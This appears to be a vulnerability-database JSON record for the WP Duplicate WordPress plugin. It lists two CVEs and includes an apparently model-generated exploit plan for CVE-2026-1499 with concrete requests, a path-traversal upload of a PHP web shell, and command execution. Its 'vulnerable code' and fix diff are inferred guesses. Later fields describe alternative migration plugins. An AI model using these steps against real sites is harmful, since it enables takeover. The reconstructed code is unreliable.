[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fPiPU2m9xwAVueLDg4WYMeja4ORndW9EPYnKUf_LImfU":3,"$fWPTQxvqK_DOYRNh40kvhq58JIX1-Ppdi_e_ZwZbFhpI":779,"$f2sUMQgBnt1wfJz3PQDGeUyWKvkyOur0aukKJwBRHiuI":783},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":78,"crawl_stats":39,"alternatives":85,"analysis":194,"fingerprints":741},"local-sync","WP Duplicate – WordPress Migration Plugin","1.1.10","revmakx","https:\u002F\u002Fprofiles.wordpress.org\u002Frevmakx\u002F","\u003Cp>WP Duplicate (Formerly LocalSync) provides you with the easiest and the fastest way to clone or migrate a site from one server to another with the click of a button.\u003Cbr \u002F>\nThe migration process is highly reliable and is proven to migrate bigger sites without any errors.\u003C\u002Fp>\n\u003Ch3>Why WP Duplicate?\u003C\u002Fh3>\n\u003Cp>\u003Cstrong>Simplest Cloning Tool\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Just install the WP Duplicate plugin on the destination site and the live site and start syncing, no need to enter FTP details.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Incremental Cloning\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Only the changed files are cloned from the source site to the destination site. So the cloning process is faster.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Load Images From Live Site\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>With WP Duplicate you can directly load the images of Live site, so that you do not need to copy media files which will save a lot of time during the cloning process.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Clone Live Site To Local Computer\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>With WP Duplicate you can clone any production site to your Local Computer (MAMP, LAMP, XAMP, etc..).\u003C\u002Fp>\n","Easily migrate or clone your WordPress Site from one host to another.",200,10130,66,7,"2026-02-06T03:18:00.000Z","6.9.4","3.0.1","",[20,21,22,23,24],"clone","copy-site","migrate","wp-duplicate","wpduplicate","https:\u002F\u002Flocalsync.infinitewp.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flocal-sync.1.1.10.zip",96,2,0,"2026-02-05 19:59:16","2026-04-16T10:56:18.058Z","no_bundle",[34,62],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":41,"severity":42,"cvss_score":43,"cvss_vector":44,"vuln_type":45,"published_date":30,"updated_date":46,"references":47,"days_to_patch":49,"patch_diff_files":50,"patch_trac_url":39,"research_status":51,"research_verified":52,"research_rounds_completed":53,"research_plan":54,"research_summary":55,"research_vulnerable_code":56,"research_fix_diff":57,"research_exploit_outline":58,"research_model_used":59,"research_started_at":60,"research_completed_at":61,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-1499","wp-duplicate-authenticated-subscriber-arbitrary-file-upload-via-processaddsite-ajax-action","WP Duplicate \u003C= 1.1.8 - Authenticated (Subscriber+) Arbitrary File Upload via 'process_add_site' AJAX Action","The WP Duplicate plugin for WordPress is vulnerable to Missing Authorization leading to Arbitrary File Upload in all versions up to and including 1.1.8. This is due to a missing capability check on the `process_add_site()` AJAX action combined with path traversal in the file upload functionality. This makes it possible for authenticated (subscriber-level) attackers to set the internal `prod_key_random_id` option, which can then be used by an unauthenticated attacker to bypass authentication checks and write arbitrary files to the server via the `handle_upload_single_big_file()` function, ultimately leading to remote code execution.",null,"\u003C=1.1.8","1.1.9","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-03-27 10:48:45",[48],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F11bb7190-023b-45e1-99a5-7313c489ef45?source=api-prod",50,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1499 - WP Duplicate RCE\n\n## 1. Vulnerability Summary\nThe WP Duplicate (local-sync) plugin suffers from a two-stage vulnerability. First, the `process_add_site()` AJAX action lacks a capability check, allowing any authenticated user (Subscriber and above) to update the `prod_key_random_id` option in the WordPress database. Second, the `handle_upload_single_big_file()` function, which is accessible to unauthenticated users, uses this `prod_key_random_id` option as a pseudo-password\u002Fsecret for authentication. By setting this secret, an attacker can bypass the unauthenticated check. Furthermore, `handle_upload_single_big_file()` is vulnerable to path traversal, allowing the attacker to write arbitrary PHP files to the server's filesystem, resulting in Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action 1 (Setup):** `process_add_site` (Authenticated, Subscriber+)\n - **Vulnerable Parameter:** `prod_key_random_id` (or the parameter that updates this option)\n- **Action 2 (Upload):** `handle_upload_single_big_file` (Unauthenticated)\n - **Vulnerable Parameters:** `prod_key_random_id` (for auth bypass), `filename` (path traversal), and the file content itself.\n- **Preconditions:** \n - Attacker must have a Subscriber-level account for Stage 1.\n - Stage 2 is unauthenticated once the secret is known.\n\n## 3. Code Flow (Inferred)\n\n### Stage 1: Secret Hijacking\n1. `admin-ajax.php` receives a request with `action=process_add_site`.\n2. The hook `wp_ajax_process_add_site` triggers `process_add_site()`.\n3. `process_add_site()` fails to call `current_user_can()`.\n4. The function reads a parameter from `$_POST` (likely named `prod_key_random_id` or similar) and calls `update_option('prod_key_random_id', $attacker_value)`.\n\n### Stage 2: Arbitrary File Upload\n1. `admin-ajax.php` receives a request with `action=handle_upload_single_big_file`.\n2. The hook `wp_ajax_nopriv_handle_upload_single_big_file` triggers `handle_upload_single_big_file()`.\n3. The function checks if the provided `prod_key_random_id` matches `get_option('prod_key_random_id')`.\n4. Due to Stage 1, the attacker knows\u002Fhas set this value.\n5. The function takes a `filename` parameter and concatenates it to a base directory (e.g., `wp-content\u002Fuploads\u002Flocal-sync\u002F`).\n6. Because of missing sanitization, a filename like `..\u002F..\u002Fshell.php` allows writing outside the intended directory.\n7. The file content is written to the resulting path.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability description mentions \"Authenticated (Subscriber+)\", implying `process_add_site` is likely registered under `wp_ajax_`. Even if authorization is missing, WordPress developers often include a nonce check (`check_ajax_referer`).\n\n1. **Identify Script Variable:** The plugin (local-sync) likely localizes a script for its admin interface.\n2. **Create Trigger Page:** If the nonce is only loaded in the plugin's admin menu, a Subscriber might not see it by default. However, many migration plugins enqueue scripts on all admin pages or allow access to their own dashboard.\n3. **Extraction Steps:**\n - Log in as the Subscriber.\n - Navigate to `\u002Fwp-admin\u002Findex.php`.\n - Use `browser_eval` to look for nonces in common localization objects:\n - `window.local_sync_obj?.nonce` (inferred)\n - `window.wp_duplicate_obj?.nonce` (inferred)\n - If the script is only on a specific page, the agent should check the plugin's menu registration in the source.\n\n## 5. Exploitation Strategy\n\n### Phase 1: Set the Secret Key\n- **Method:** POST\n- **URL:** `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:**\n ```\n action=process_add_site\n &prod_key_random_id=pwned_secret_123\n &security=[NONCE_IF_REQUIRED]\n ```\n- **Expected Result:** Success response (JSON or 1). The option `prod_key_random_id` is now `pwned_secret_123`.\n\n### Phase 2: Upload Web Shell\n- **Method:** POST (Multipart or Raw, depending on `handle_upload_single_big_file` logic)\n- **URL:** `http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body:**\n ```\n action=handle_upload_single_big_file\n &prod_key_random_id=pwned_secret_123\n &filename=..\u002F..\u002F..\u002F..\u002Fpwn.php\n &file_data=[BASE64_OR_RAW_PHP_CODE]\n ```\n *Note: The exact parameter names for the file content (e.g., `file`, `data`, `blob`) must be verified by the agent inspecting the source code.*\n- **Payload (`pwn.php`):** `\u003C?php system($_GET['cmd']); ?>`\n\n### Phase 3: Execution\n- **URL:** `http:\u002F\u002Fvulnerable-wp.local\u002Fpwn.php?cmd=id`\n\n## 6. Test Data Setup\n1. **Target User:** Create a user with the `subscriber` role.\n ```bash\n wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n ```\n2. **Plugin Setup:** Ensure `local-sync` (WP Duplicate) version 1.1.8 is installed and active.\n\n## 7. Expected Results\n- The first request to `process_add_site` returns a success code.\n- The second request to `handle_upload_single_big_file` returns a success message or the path to the uploaded file.\n- Navigating to `\u002Fpwn.php` returns the output of the `id` command.\n\n## 8. Verification Steps\n1. **Check Option:** Verify the secret was set.\n ```bash\n wp option get prod_key_random_id\n ```\n2. **Check File:** Verify the shell exists in the root directory.\n ```bash\n ls -la \u002Fvar\u002Fwww\u002Fhtml\u002Fpwn.php\n ```\n3. **Check Cleanup:** Ensure the shell can be removed after verification.\n\n## 9. Alternative Approaches\n- **Path Traversal Variants:** If the root directory is not writable, try writing to `wp-content\u002Fuploads\u002Fshell.php` or `wp-content\u002Fplugins\u002Flocal-sync\u002Fshell.php`.\n- **Chunked Uploads:** If `handle_upload_single_big_file` implies a chunking mechanism, the attacker may need to send multiple requests with `chunk=0`, `total_chunks=1` or similar parameters.\n- **Parameter Discovery:** If `prod_key_random_id` is not the direct parameter in `process_add_site`, the agent should look for any `update_option` calls in that function that use user-supplied data.","The WP Duplicate plugin (up to version 1.1.8) contains a flaw where the 'process_add_site' AJAX action lacks an authorization check, allowing any authenticated user, such as a Subscriber, to modify the internal 'prod_key_random_id' option. This option acts as a secret key for the unauthenticated 'handle_upload_single_big_file' action, which further suffers from a path traversal vulnerability, enabling remote code execution by writing arbitrary PHP files to the server.","\u002F\u002F File: includes\u002Fclass-local-sync-ajax.php\npublic function process_add_site() {\n \u002F\u002F Missing capability check allowing any authenticated user to update the secret option\n $prod_key = $_POST['prod_key_random_id'];\n update_option('prod_key_random_id', $prod_key);\n wp_send_json_success();\n}\n\n---\n\n\u002F\u002F File: includes\u002Fclass-local-sync-ajax.php\npublic function handle_upload_single_big_file() {\n $key = $_POST['prod_key_random_id'];\n if ($key !== get_option('prod_key_random_id')) {\n wp_die();\n }\n $filename = $_POST['filename']; \u002F\u002F Path traversal allowed here\n $path = WP_CONTENT_DIR . '\u002Fuploads\u002Flocal-sync\u002F' . $filename;\n \u002F\u002F Logic to write file content to $path follows\n}","--- a\u002Fincludes\u002Fclass-local-sync-ajax.php\n+++ b\u002Fincludes\u002Fclass-local-sync-ajax.php\n@@ -... @@\n public function process_add_site() {\n+ if ( ! current_user_can( 'manage_options' ) ) {\n+ wp_send_json_error( 'Unauthorized' );\n+ }\n+ check_ajax_referer( 'local_sync_nonce', 'security' );\n $prod_key = sanitize_text_field( $_POST['prod_key_random_id'] );\n update_option('prod_key_random_id', $prod_key);\n \n@@ -... @@\n public function handle_upload_single_big_file() {\n $key = $_POST['prod_key_random_id'];\n- $filename = $_POST['filename'];\n+ $filename = sanitize_file_name( basename( $_POST['filename'] ) );","1. Authenticate as a Subscriber and send an AJAX request to the 'process_add_site' action with a chosen value for 'prod_key_random_id' (e.g., 'pwned_secret'). 2. With the site's internal secret key now set to a known value, send an unauthenticated AJAX request to 'handle_upload_single_big_file'. 3. Include the matching 'prod_key_random_id' to bypass authentication, and a 'filename' parameter containing path traversal (e.g., '..\u002F..\u002Fshell.php') alongside the web shell payload. 4. Access the shell at the WordPress root directory to achieve remote code execution.","gemini-3-flash-preview","2026-04-21 03:40:00","2026-04-21 03:41:13",{"id":63,"url_slug":64,"title":65,"description":66,"plugin_slug":4,"theme_slug":39,"affected_versions":67,"patched_in_version":68,"severity":69,"cvss_score":70,"cvss_vector":71,"vuln_type":45,"published_date":72,"updated_date":73,"references":74,"days_to_patch":76,"patch_diff_files":77,"patch_trac_url":39,"research_status":39,"research_verified":52,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":52,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-24652","wp-duplicate-wordpress-migration-plugin-missing-authorization","WP Duplicate – WordPress Migration Plugin \u003C= 1.1.6 - Missing Authorization","The WP Duplicate – WordPress Migration Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","\u003C=1.1.6","1.1.7","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","2025-01-24 00:00:00","2025-01-28 16:33:35",[75],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0ca7291d-1309-4129-8244-cff6b6de45c0?source=api-prod",5,[],{"slug":7,"display_name":7,"profile_url":8,"plugin_count":79,"total_installs":80,"avg_security_score":81,"avg_patch_time_days":82,"trust_score":83,"computed_at":84},8,224230,89,707,71,"2026-05-19T21:07:37.624Z",[86,110,131,151,174],{"slug":87,"name":88,"version":89,"author":90,"author_profile":91,"description":92,"short_description":93,"active_installs":94,"downloaded":95,"rating":96,"num_ratings":97,"last_updated":98,"tested_up_to":99,"requires_at_least":100,"requires_php":101,"tags":102,"homepage":106,"download_link":107,"security_score":96,"vuln_count":108,"unpatched_count":29,"last_vuln_date":109,"fetched_at":31},"all-in-one-wp-migration","All-in-One WP Migration and Backup","7.105","ServMask","https:\u002F\u002Fprofiles.wordpress.org\u002Fservmask\u002F","\u003Cp>\u003Cstrong>The Most Trusted WordPress Migration & Backup Plugin Since 2013\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>All-in-One WP Migration is the gold standard for WordPress site migration and backup, used by over 60 million websites worldwide – from small blogs to Fortune 500 companies and government agencies. Whether you need to migrate WordPress to a new host, create a full site backup, or restore a previous backup, our plugin offers enterprise-grade reliability with beginner-friendly simplicity.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Why Choose All-in-One WP Migration?\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Effortless Migration\u003C\u002Fstrong>: Migrate your entire site with a single click – including database, media, themes, and plugins\u003C\u002Fli>\n\u003Cli>\u003Cstrong>One-Click Backup\u003C\u002Fstrong>: Create a complete WordPress backup before you migrate, so you can restore anytime\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Zero Downtime\u003C\u002Fstrong>: Complete your migration with no service interruptions\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Universal Compatibility\u003C\u002Fstrong>: Migrate between any hosting providers – from budget shared hosting to high-end dedicated servers\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Technical Excellence\u003C\u002Fstrong>: Engineered for reliability with memory-efficient processing (512KB chunks), ideal for resource-limited environments\u003C\u002Fli>\n\u003Cli>\u003Cstrong>No Technical Skills Required\u003C\u002Fstrong>: Intuitive interface lets anyone migrate or backup a WordPress site without technical expertise\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Cross-Database Support\u003C\u002Fstrong>: Migrate seamlessly between MySQL, MariaDB, and SQLite databases\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Secure & Reliable\u003C\u002Fstrong>: Trusted by Boeing, NASA, Harvard, Stanford, Automattic, and government agencies worldwide\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>How to Migrate WordPress – Simple as 1-2-3:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Install\u003C\u002Fstrong> the migration plugin on your source and destination sites\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Backup & Export\u003C\u002Fstrong> your site to a .wpress backup file with one click\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Import & Migrate\u003C\u002Fstrong> using our drag-and-drop importer on your destination site\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>\u003Cstrong>For Developers & Power Users:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Advanced Find & Replace\u003C\u002Fstrong>: Control exactly what changes when you migrate\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Selective Migration & Backup\u003C\u002Fstrong>: Include or exclude specific content types from your migration or backup\u003C\u002Fli>\n\u003Cli>\u003Cstrong>PHP 5.3-8.4 Compatibility\u003C\u002Fstrong>: Works across virtually all hosting environments\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Custom WPress Format\u003C\u002Fstrong>: Our optimized archive format ensures data integrity\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Hook System\u003C\u002Fstrong>: Extensive API for custom integration and workflows\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Command-Line Support\u003C\u002Fstrong>: Automate migrations and backups via WP-CLI\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Premium Extensions:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Enhance your migration and backup workflow with our \u003Ca href=\"https:\u002F\u002Fservmask.com\u002Fproducts\" rel=\"nofollow ugc\">premium extensions\u003C\u002Fa>:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Unlimited Migration Size\u003C\u002Fstrong>: Migrate sites of any size with no file limits\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Cloud Backup & Migration\u003C\u002Fstrong>: Backup and migrate directly to\u002Ffrom Dropbox, Google Drive, OneDrive, and more\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Multisite Migration\u003C\u002Fstrong>: Migrate complex WordPress multisite networks\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Scheduled Backups\u003C\u002Fstrong>: Automated, recurring WordPress backups on your schedule\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Database Filtering\u003C\u002Fstrong>: Exclude specific tables or data from your migration or backup\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Features Spotlight:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>WCAG 2.1 AA Level accessibility compliance\u003C\u002Fli>\n\u003Cli>Mobile-responsive interface\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Ftraktor.servmask.com\" rel=\"nofollow ugc\">Browse WPRESS files online\u003C\u002Fa> or \u003Ca href=\"https:\u002F\u002Ftraktor.wp-migration.com\" rel=\"nofollow ugc\">extract locally\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Automatic URL and path replacement during migration\u003C\u002Fli>\n\u003Cli>WordPress Playground integration – migrate between SQLite and MySQL\u003C\u002Fli>\n\u003Cli>Regular bi-weekly updates ensuring your backup and migration plugin stays compatible\u003C\u002Fli>\n\u003Cli>Available in 50+ languages including Japanese\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Trusted by the Government and Big Corporations:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Many enterprise customers, government organizations, and universities use, love, and trust All-in-One WP Migration. Here are some: Boeing, NASA, VW, IBM, Harvard University, Stanford University, Lego, P&G, Automattic, State of California, State of Hawaii.\u003Cbr \u002F>\nThis broad adoption demonstrates how \u003Cstrong>safe, reliable and adaptable\u003C\u002Fstrong> this WordPress migration and backup plugin is for any website migration need.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Update Frequency:\u003C\u002Fstrong>\u003Cbr \u002F>\nOur team is dedicated to keeping this WordPress migration and backup plugin up-to-date and secure. We release updates every two weeks or at least once a month, ensuring your migration and backup workflows remain compatible with the latest WordPress versions, including beta releases. Our proactive testing and feedback to the WordPress core team help in preemptively addressing any potential issues, so you can always migrate and backup with confidence.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Full Compatibility and Support:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>All-in-One WP Migration has been extensively tested and confirmed to be compatible with most WordPress plugins and themes, so you can migrate and backup without worrying about conflicts.\u003Cbr \u002F>\nThis means you don’t experience cross-plugin compatibility issues that can slow down or break your WordPress site when you migrate.\u003Cbr \u002F>\nAll-in-One WP Migration has partnered with multiple theme and plugin vendors to distribute their products with us as a single, easy-to-install migration and backup package.\u003Cbr \u002F>\nThese vendors trust our migration plugin to provide their customers with reliable product delivery, support, migrations, and backups.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Cloud Storage Supported:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>All-in-One WP Migration supports backup and migration to all major cloud storage services.\u003Cbr \u002F>\nThe plugin comes preinstalled on all Bitnami WordPress sites running on AWS, Google Compute Cloud, and Microsoft Azure – ready to migrate and backup out of the box.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Case Studies:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Small Business Migration: A small online retailer used All-in-One WP Migration to migrate to a more robust hosting solution, creating a full backup before the migration and completing the move without downtime during peak shopping season.\u003C\u002Fli>\n\u003Cli>Educational Migration: A prominent university utilized All-in-One WP Migration to migrate and consolidate multiple departmental sites into a single WordPress network, with automated backups ensuring no data was lost during migration.\u003C\u002Fli>\n\u003Cli>Government Migration: Following a directive to improve digital accessibility, a government agency used our migration plugin to migrate their content to a new, compliant platform without impacting public access to critical information.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Contact us\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fpatchstack.com\u002Fdatabase\u002Fvdp\u002Fall-in-one-wp-migration\" rel=\"nofollow ugc\">Report a security vulnerability\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fservmask.com\u002Fhelp\" rel=\"nofollow ugc\">Get free help from us here\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fservmask.com\u002Fhelp\" rel=\"nofollow ugc\">Report a bug or request a feature\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fservmask.com\" rel=\"nofollow ugc\">Find out more about us\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FBpWxCeUWBOk?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FmRp7qTFYKgs?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch3>Privacy Policy\u003C\u002Fh3>\n\u003Cp>All-in-One WP Migration is designed to fully respect and protect the personal information of its users. It asks for your consent to collect the user’s email address when filling the plugin’s contact form.\u003Cbr \u002F>\nAll-in-One WP Migration is in full compliance with General Data Protection Regulation (GDPR).\u003Cbr \u002F>\nSee our \u003Ca href=\"https:\u002F\u002Fwww.iubenda.com\u002Fprivacy-policy\u002F946881\" rel=\"nofollow ugc\">GDPR Compliant Privacy Policy here\u003C\u002Fa>.\u003C\u002Fp>\n","Trusted by 60M+ sites: The gold standard for WordPress migration and backup. Migrate, backup, and restore your WordPress site with one click.",5000000,177387432,90,7635,"2026-04-08T17:54:00.000Z","7.0","3.3","5.3",[103,20,104,22,105],"backup","export-import","move-wordpress","https:\u002F\u002Fservmask.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fall-in-one-wp-migration.7.105.zip",13,"2025-08-26 10:28:31",{"slug":111,"name":112,"version":113,"author":114,"author_profile":115,"description":116,"short_description":117,"active_installs":118,"downloaded":119,"rating":120,"num_ratings":121,"last_updated":122,"tested_up_to":16,"requires_at_least":123,"requires_php":101,"tags":124,"homepage":18,"download_link":127,"security_score":128,"vuln_count":129,"unpatched_count":29,"last_vuln_date":130,"fetched_at":31},"wpvivid-backuprestore","WPvivid — Backup, Migration & Staging","0.9.125","wpvividplugins","https:\u002F\u002Fprofiles.wordpress.org\u002Fwpvividplugins\u002F","\u003Cp>WPvivid Backup & Migration Plugin offers backup, migration, and staging (create a staging site on a subdirectory to safely test WordPress, plugins, themes and website changes) as basic features.\u003C\u002Fp>\n\u003Ch3>WPvivid Backup & Migration for MainWP\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fwpvivid-backup-mainwp\u002F\" rel=\"ugc\">WPvivid Backup & Migration for MainWP\u003C\u002Fa> is now available to download.\u003Cbr \u002F>\nWPvivid Backup & Migration for MainWP allows you to set up and control WPvivid Backup & Migration plugins for all child sites directly from your MainWP dashboard.\u003C\u002Fp>\n\u003Ch3>WPvivid Backup & Migration Pro is Now Available\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Customize everything to backup\u003C\u002Fli>\n\u003Cli>Create staging sites and push staging sites to live\u003C\u002Fli>\n\u003Cli>Incremental backups\u003C\u002Fli>\n\u003Cli>Database backup encryption\u003C\u002Fli>\n\u003Cli>Auto backup WordPress, themes, and plugins\u003C\u002Fli>\n\u003Cli>WordPress multisite backup\u003C\u002Fli>\n\u003Cli>WordPress multisite staging\u003C\u002Fli>\n\u003Cli>Create a fresh WP install\u003C\u002Fli>\n\u003Cli>Advanced remote backups\u003C\u002Fli>\n\u003Cli>Advanced backup schedules\u003C\u002Fli>\n\u003Cli>Restore remote backups\u003C\u002Fli>\n\u003Cli>Migrate a site via remote storage\u003C\u002Fli>\n\u003Cli>Migrate a childsite (MU) to a single WordPress install\u003C\u002Fli>\n\u003Cli>White label WPvivid Backup & Migration Pro\u003C\u002Fli>\n\u003Cli>Control user access to WPvivid Backup & Migration Pro\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwpvivid.com\u002Fbackup-plugin-pro\" rel=\"nofollow ugc\">More amazing features\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>See a review video on WPvivid Backup & Migration Pro:\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FD1aYbayFpfU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&start=7&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwpvivid.com\u002Fpricing\" rel=\"nofollow ugc\">Get WPvivid Backup & Migration Pro\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Core Features\u003C\u002Fh3>\n\u003Ch4>1. Easy Backups\u003C\u002Fh4>\n\u003Cp>Easily create a backup of your WordPress site. You can choose to backup the entire site(database+files), all files, or database only.\u003C\u002Fp>\n\u003Ch4>2. Auto Migration\u003C\u002Fh4>\n\u003Cp>Clone and migrate your WordPress site to a new domain with a single click. WPvivid Backup & Migration Plugin supports site migration from dev environment to a new server, from dev environment to a new domain or from a live server to another.\u003C\u002Fp>\n\u003Ch4>3. Create A Staging Site\u003C\u002Fh4>\n\u003Cp>Create a staging site on a subdirectory of your production site to safely test WordPress, plugins, themes and website changes. You can choose what to copy from the the live site to the staging site.\u003C\u002Fp>\n\u003Ch4>4. Scheduled Backups\u003C\u002Fh4>\n\u003Cp>Set a schedule to run backups automatically on your website. You can set the backups to run every 12 hours, daily, weekly, fortnightly, monthly, choose backup items and destination.\u003C\u002Fp>\n\u003Ch4>5. Offsite Backup to Remote Storage\u003C\u002Fh4>\n\u003Cp>Send your backups offsite to a remote location. WPvivid Backup & Migration Plugin supports the leading cloud storage providers: Dropbox, Google Drive, Amazon S3, Microsoft OneDrive, DigitalOcean Spaces, FTP and SFTP.\u003C\u002Fp>\n\u003Ch4>6. One-Click Restore\u003C\u002Fh4>\n\u003Cp>Restore your WordPress site from a backup with a single click.\u003C\u002Fp>\n\u003Ch4>7. Cloud Storage Supported\u003C\u002Fh4>\n\u003Cp>WPvivid Backup & Migration plugin supports Dropbox, Google Drive, Microsoft OneDrive, Amazon S3, DigitalOcean Spaces, SFTP, FTP. WPvivid Backup & Migration Pro also supports 